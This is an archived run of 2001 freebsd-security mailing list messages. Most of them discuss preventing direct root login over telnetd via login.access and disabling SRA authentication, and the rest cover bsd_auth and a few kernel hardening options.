X-URL: http://www.imasy.org/~ume/ X-Operating-System: FreeBSD 5.0-CURRENT Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> On Fri, 11 May 2001 07:59:55 -0400 >>>>> Mike Tancsa said: >Or maybe via the /etc/login.access file. man login.access >Btw. Don't use telnet, and never login as root. Use `su' instead. mike> Yes, I dont ever use it but customers do to this particular machine. I mike> will take a look at login.access. Do you know if it works, or if telnetd mike> now ignores that as well ? It's working for me. My login.access has following entry: -:root:ALL EXCEPT console ttyv0 ttyv1 ttyv2 ttyv3 ttyv4 ttyv5 ttyv6 ttyv7 Or, you can disable SRA authentication by adding `-X sra' option to telnetd in /etc/inet.conf -- Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org http://www.imasy.org/~ume/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 9:27:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 4161437B43C for ; Fri, 11 May 2001 09:27:19 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 45398 invoked by uid 1000); 11 May 2001 16:26:41 -0000 Date: Fri, 11 May 2001 19:26:41 +0300 From: Peter Pentchev To: mike@sentex.net Cc: Hajimu UMEMOTO , ZGabor@CoDe.hu, freebsd-security@freebsd.org Subject: Re: preventing direct root login on telnetd Message-ID: <20010511192641.E24224@ringworld.oblivion.bg> Mail-Followup-To: mike@sentex.net, Hajimu UMEMOTO , ZGabor@CoDe.hu, freebsd-security@freebsd.org References: <4.2.2.20010511000303.036916f8@192.168.0.12> <20010511071947.C264@zg.CoDe.hu> <4.2.2.20010511075808.023ee200@192.168.0.12> <20010512.012256.74710954.ume@mahoroba.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010512.012256.74710954.ume@mahoroba.org>; from ume@mahoroba.org on Sat, May 12, 2001 at 01:22:56AM +0900 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 12, 2001 at 01:22:56AM +0900, Hajimu UMEMOTO wrote: > >>>>> On Fri, 11 May 2001 07:59:55 -0400 > >>>>> Mike Tancsa said: > > >Or maybe via the /etc/login.access file. man login.access > >Btw. Don't use telnet, and never login as root. Use `su' instead. > > mike> Yes, I dont ever use it but customers do to this particular machine. I > mike> will take a look at login.access. Do you know if it works, or if telnetd > mike> now ignores that as well ? > > It's working for me. My login.access has following entry: > > -:root:ALL EXCEPT console ttyv0 ttyv1 ttyv2 ttyv3 ttyv4 ttyv5 ttyv6 ttyv7 > > Or, you can disable SRA authentication by adding `-X sra' option to > telnetd in /etc/inet.conf login.conf should work - telnetd invokes login(1). G'luck, Peter -- What would this sentence be like if it weren't self-referential? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 10: 3:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 9EE6D37B423 for ; Fri, 11 May 2001 10:03:07 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simoeon.sentex.net (simeon.sentex.ca [209.112.4.47]) by smtp1.sentex.ca (8.11.2/8.11.1) with ESMTP id f4BH2VU93774; Fri, 11 May 2001 13:02:31 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20010511125356.02b7cc30@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Fri, 11 May 2001 12:56:28 -0400 To: Hajimu UMEMOTO From: Mike Tancsa Subject: Re: preventing direct root login on telnetd Cc: freebsd-security@freebsd.org In-Reply-To: <20010512.012256.74710954.ume@mahoroba.org> References: <4.2.2.20010511075808.023ee200@192.168.0.12> <4.2.2.20010511000303.036916f8@192.168.0.12> <20010511071947.C264@zg.CoDe.hu> <4.2.2.20010511075808.023ee200@192.168.0.12> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 01:22 AM 5/12/01 +0900, Hajimu UMEMOTO wrote: >mike> Yes, I dont ever use it but customers do to this particular machine. I >mike> will take a look at login.access. Do you know if it works, or if >telnetd >mike> now ignores that as well ? > >It's working for me. My login.access has following entry: > > -:root:ALL EXCEPT console ttyv0 ttyv1 ttyv2 ttyv3 ttyv4 ttyv5 ttyv6 ttyv7 Thanks, Its almost there. The only problem is that if you give it the correct password, [ SRA accepts you ] Permission denied. Connection closed by foreign host. The potential attacker is notified of it being correct before being booted. >Or, you can disable SRA authentication by adding `-X sra' option to >telnetd in /etc/inet.conf Super, this is the best for me for now. ---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 12 12:59:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from totem.fix.no (totem.fix.no [213.142.66.130]) by hub.freebsd.org (Postfix) with ESMTP id 856E937B43E for ; Sat, 12 May 2001 12:59:46 -0700 (PDT) (envelope-from anders@totem.fix.no) Received: by totem.fix.no (Postfix, from userid 1000) id 436C73CC8; Sat, 12 May 2001 21:59:35 +0200 (CEST) Date: Sat, 12 May 2001 21:59:35 +0200 From: Anders Nordby To: freebsd-security@freebsd.org Subject: bsd_auth, PAM, etc. Message-ID: <20010512215935.A66047@totem.fix.no> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i X-Operating-System: FreeBSD 4.1.1-STABLE X-PGP-Key: http://anders.fix.no/pgp/ X-PGP-Key-FingerPrint: 1E0F C53C D8DF 6A8F EAAD 19C5 D12A BC9F 0083 5956 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I noticed OpenBSD has something called bsd_auth, an authentication system obtained from BSDI. Is this feasible for FreeBSD to get implemented too? PAM works ok for me and is quite easy to implement support for, make new modules etc. But our implementation seems to be directly dependant on Linuxisms, and we don't know where that route is going to end up. Oh well, I just wanted to notice you on this in case you didn't know about bsd_auth. The man page for it can be looked up on: http://www.openbsd.org/cgi-bin/man.cgi?query=bsd_auth&sektion=3&apropos=0&manpath=OpenBSD+Current Cheers, -- Anders. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 12 22: 6:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from one.net (ip-216-23-48-192.adsl.one.net [216.23.48.192]) by hub.freebsd.org (Postfix) with ESMTP id A33A937B424 for ; Sat, 12 May 2001 22:06:25 -0700 (PDT) (envelope-from cokane@one.net) Received: (from cokane@localhost) by one.net (8.11.3/8.11.3) id f4D5MTv00633; Sun, 13 May 2001 01:22:29 -0400 (EDT) (envelope-from cokane) Date: Sun, 13 May 2001 01:22:29 -0400 From: Coleman Kane To: Dag-Erling Smorgrav Cc: Retal , freebsd-security@FreeBSD.ORG Subject: Re: Some Kernel options, sc is broken Message-ID: <20010513012229.A561@cokane.yi.org> References: <002601ba1df7$4da07940$b88f39d5@a> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from des@ofug.org on Thu, May 10, 2001 at 11:09:06AM +0200 X-Vim: vim:tw=70:ts=4:sw=4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well, their is brokeness here. The sc driver no longer reads the flags from the hints correctly. I realized this when my USB keyboard would not attach to the console if it was probed after boot. I have one of the early VIA 586 chips with a broken USB controller on it (windows uses the 'USB filter patch' to make it more reliable). Basically, sometimes it returns an error on probe and has to be unplugged and plugged back in until it works. Well, I can't set the flag to allow the sc driver to constantly probe until it finds a kbd, so I have to reboot remotely. I sent mail to the last committer and haven't gotten a reply. I haven't had the time or I would have fixed it myself. Dag-Erling Smorgrav had the audacity to say: > "Retal" writes: > > options KBD_INSTALL_CDEV # install a CDEV entry in /dev > > This option has no (visible) effect unless you use a USB keyboard. > > > options TCP_DROP_SYNFIN #drop TCP packets with SYN+FIN > > This option has no effect unless you set tcp_drop_synfin="YES" in > /etc/rc.conf. > > > options TCP_RESTRICT_RST #restrict emission of TCP RST > > Don't. Use blackhole(4) instead. > > > options ICMP_BANDLIM > > This option has an easily demonstrable effect: try running 'nmap -sS' > against your machine. > > > BTW: if i add TCP_DROP_SYNFIN, it should effect setup option in my > > firewall ?if it is, how ? > > See the rc.conf(5) man page. > > DES > -- > Dag-Erling Smorgrav - des@ofug.org > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message